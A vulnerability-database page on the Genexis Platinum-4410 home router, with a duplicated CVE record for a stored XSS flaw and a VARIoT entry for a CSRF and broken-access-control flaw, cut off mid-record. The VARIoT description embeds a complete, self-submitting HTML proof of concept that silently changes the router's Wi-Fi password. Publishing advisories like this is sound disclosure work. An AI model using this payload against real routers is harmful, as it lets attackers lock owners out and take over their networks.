Search criteria
7 vulnerabilities found for Platinum-4410 by Genexis
CVE-2021-47858 (GCVE-0-2021-47858)
Vulnerability from nvd – Published: 2026-01-21 17:27 – Updated: 2026-01-22 22:08 Unsupported When Assigned
VLAI?
Title
Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
Summary
Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the 'start_addr' parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Genexis | Platinum-4410 |
Affected:
Firmware 1.31A
|
Credits
Jithin KS
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47858",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T22:08:28.917335Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T22:08:58.787Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Platinum-4410",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "Firmware 1.31A"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jithin KS"
}
],
"datePublic": "2020-03-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the \u0027start_addr\u0027 parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-21T17:27:40.393Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49709",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49709"
},
{
"name": "Genexis Product Page",
"tags": [
"product"
],
"url": "https://genexis.eu/product/platinum-series/"
},
{
"name": "VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/genexis-platinum-p-a-startaddr-persistent-cross-site-scripting"
}
],
"tags": [
"unsupported-when-assigned"
],
"title": "Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47858",
"datePublished": "2026-01-21T17:27:40.393Z",
"dateReserved": "2026-01-14T17:11:19.904Z",
"dateUpdated": "2026-01-22T22:08:58.787Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2021-47858 (GCVE-0-2021-47858)
Vulnerability from cvelistv5 – Published: 2026-01-21 17:27 – Updated: 2026-01-22 22:08 Unsupported When Assigned
VLAI?
Title
Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
Summary
Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the 'start_addr' parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Genexis | Platinum-4410 |
Affected:
Firmware 1.31A
|
Credits
Jithin KS
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47858",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-22T22:08:28.917335Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-22T22:08:58.787Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Platinum-4410",
"vendor": "Genexis",
"versions": [
{
"status": "affected",
"version": "Firmware 1.31A"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Jithin KS"
}
],
"datePublic": "2020-03-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the \u0027start_addr\u0027 parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-21T17:27:40.393Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-49709",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/49709"
},
{
"name": "Genexis Product Page",
"tags": [
"product"
],
"url": "https://genexis.eu/product/platinum-series/"
},
{
"name": "VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/genexis-platinum-p-a-startaddr-persistent-cross-site-scripting"
}
],
"tags": [
"unsupported-when-assigned"
],
"title": "Genexis Platinum-4410 P4410-V2-1.31A - \u0027start_addr\u0027 Persistent Cross-Site Scripting",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2021-47858",
"datePublished": "2026-01-21T17:27:40.393Z",
"dateReserved": "2026-01-14T17:11:19.904Z",
"dateUpdated": "2026-01-22T22:08:58.787Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
VAR-202009-0727
Vulnerability from variot - Updated: 2025-01-30 20:23A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Date: 28-08-2020
Vendor Homepage: https://www.gxgroup.eu/ont-products/
Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
Version: v2.1 (software version P4410-V2-1.28)
CVE : CVE-2020-25015
-
Proof of Concept
Create an HTML file with the following code:
history.pushState('', '', '/') document.forms[0].submit();Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
-
PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
-
Timeline
Vulnerability reported to the Genexis team – August 28, 2020 Team confirmed firmware release containing fix – September 14, 2020
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202009-0727",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "4410v2-1.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jinson Varghese Behanan",
"sources": [
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
],
"trust": 0.7
},
"cve": "CVE-2020-25015",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-25015",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-56086",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2020-25015",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-25015",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-25015",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-25015",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point\u2019s password. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Information may be tampered with. Genexis Platinum 4410 is a router of genexis. An attacker can use this vulnerability to send unexpected requests to the server through the affected client. # Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF\n# Date: 28-08-2020\n# Vendor Homepage: https://www.gxgroup.eu/ont-products/\n# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)\n# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/\n# Version: v2.1 (software version P4410-V2-1.28)\n# CVE : CVE-2020-25015\n\n1. \n\n2. \n\n3. Proof of Concept\n\nCreate an HTML file with the following code:\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/cgi-bin/net-wlan.asp\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"wlEnbl\" value=\"ON\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys1\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys2\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlKeys3\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlgMode\" value=\"9\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlAuthMode\" value=\"WPAPSKWPA2PSK\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlEnbl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWPSMode\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"henableSsid\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"hwlHide\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isInWPSing\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeAll\" value=\"7\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsConfModeNone\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"hWpsStart\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"isCUCSupport\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSIDPre\" value=\"N\u0026#47;A\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControlhidden\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"ht\u0026#95;bw\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlgMode\" value=\"b\u0026#44;g\u0026#44;n\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlChannel\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlTxPwr\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsidIdx\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"SSID\u0026#95;Flag\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSsid\" value=\"JINSON\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlMcs\" value=\"33\" /\u003e\n \u003cinput type=\"hidden\" name=\"bwControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"giControl\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"enableSsid\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlAssociateNum\" value=\"32\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlSecurMode\" value=\"WPAand11i\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlPreauth\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlNetReauth\" value=\"1\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaPsk\" value=\"NEWPASSWORD\" /\u003e\n \u003cinput type=\"hidden\" name=\"cb\u0026#95;enablshowpsw\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpaGtkRekey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusIPAddr\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusPort\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlRadiusKey\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlWpa\" value=\"TKIPAES\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeyBit\" value=\"64\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"wlKeys\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"WpsActive\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"wpsmode\" value=\"ap\u0026#45;pbc\" /\u003e\n \u003cinput type=\"hidden\" name=\"pinvalue\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"Save\u0026#95;Flag\" value=\"1\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003cscript\u003e\n document.forms[0].submit();\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\nOpen this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD\n\n\n4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk\u0026feature=emb_title\n\n3. Timeline\n\nVulnerability reported to the Genexis team \u2013 August 28, 2020\nTeam confirmed firmware release containing fix \u2013 September 14, 2020\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "PACKETSTORM",
"id": "159936"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25015",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "159936",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-56086",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "49000",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-25015",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"id": "VAR-202009-0727",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
],
"trust": 1.423214285
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"network device"
],
"sub_category": "router",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
}
]
},
"last_update_date": "2025-01-30T20:23:51.878000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
},
{
"title": "Patch for Genexis Platinum cross-site request forgery vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/236092"
},
{
"title": "Genexis Platinum Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=128996"
},
{
"title": "https://github.com/jinsonvarghese/jinsonvarghese",
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/159936/genexis-platinum-4410-p4410-v2-1.28-missing-access-control-csrf.html"
},
{
"trust": 2.6,
"url": "https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25015"
},
{
"trust": 1.7,
"url": "https://www.jinsonvarghese.com/broken-access-control-csrf-in-genexis-platinum-4410/"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/49000"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/jinsonvarghese/jinsonvarghese"
},
{
"trust": 0.1,
"url": "https://www.gxgroup.eu/ont-products/"
},
{
"trust": 0.1,
"url": "https://www.youtube.com/watch?v=nsu5andh2rk\u0026feature=emb_title"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/cgi-bin/net-wlan.asp\""
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2020-56086"
},
{
"db": "VULMON",
"id": "CVE-2020-25015"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-011232"
},
{
"db": "PACKETSTORM",
"id": "159936"
},
{
"db": "CNNVD",
"id": "CNNVD-202009-1006"
},
{
"db": "NVD",
"id": "CVE-2020-25015"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
